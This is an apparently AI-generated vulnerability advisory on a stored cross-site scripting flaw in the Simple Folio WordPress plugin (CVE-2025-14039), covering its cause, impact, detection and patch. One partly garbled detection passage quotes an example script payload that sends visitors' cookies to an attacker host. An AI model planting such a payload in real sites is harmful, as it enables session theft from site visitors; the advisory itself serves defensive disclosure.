
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14039 is a Stored Cross-Site Scripting (XSS) vulnerability in the Simple Folio plugin for WordPress, developed by PressTigers. It affects all versions up to and including 1.1.1, and stems from insufficient input sanitization and output escaping on the _simple_folio_item_client_name and _simple_folio_item_link meta fields. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on January 28, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin fails to properly sanitize user-supplied input stored in the _simple_folio_item_client_name and _simple_folio_item_link post meta fields, and does not escape this data on output in the single-simple-folio.php template (lines 70 and 76). An attacker with at least Contributor-level WordPress access can save a malicious script payload into these fields via the post editor; the payload is then rendered and executed in the browser of any visitor who views the affected portfolio page (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages served to all site visitors, impacting both confidentiality and integrity. Injected scripts can steal session cookies, capture credentials, redirect users to phishing sites, or perform actions on behalf of authenticated users (including administrators). The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect other users' browsers (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14039. The EPSS score is approximately 0.036%, indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Wordfence Weekly Report).
/wp-content/plugins/simple-folio/readme.txt) or using web scanning tools._simple_folio_item_client_name or _simple_folio_item_link meta fields. For example, set the client name field to <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script> tags or JavaScript event handlers (e.g., onerror, onload) stored in the _simple_folio_item_client_name or _simple_folio_item_link post meta fields in the WordPress wp_postmeta table./wp-admin/post.php or the REST API from Contributor-level accounts containing encoded script payloads in portfolio item fields.single-simple-folio.php or other plugin template files if an attacker escalated access and attempted to persist via file modification.WordPress site administrators should update the Simple Folio plugin to a version beyond 1.1.1 that includes the fix for this vulnerability; the patch was committed to the plugin repository (changeset 3442515). If an update is not immediately available, administrators should restrict Contributor-level user registration and audit existing Contributor accounts for suspicious portfolio entries. Reviewing and sanitizing existing _simple_folio_item_client_name and _simple_folio_item_link meta field values in the database is also recommended (Wordfence, WordPress Trac Changeset).
Wordfence reported the vulnerability as part of their weekly WordPress vulnerability intelligence report for January 26–February 1, 2026, noting it as a medium-severity stored XSS issue (Wordfence Weekly Report). A brief technical write-up was published by Infinit Security shortly after disclosure (Infinit Security). No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."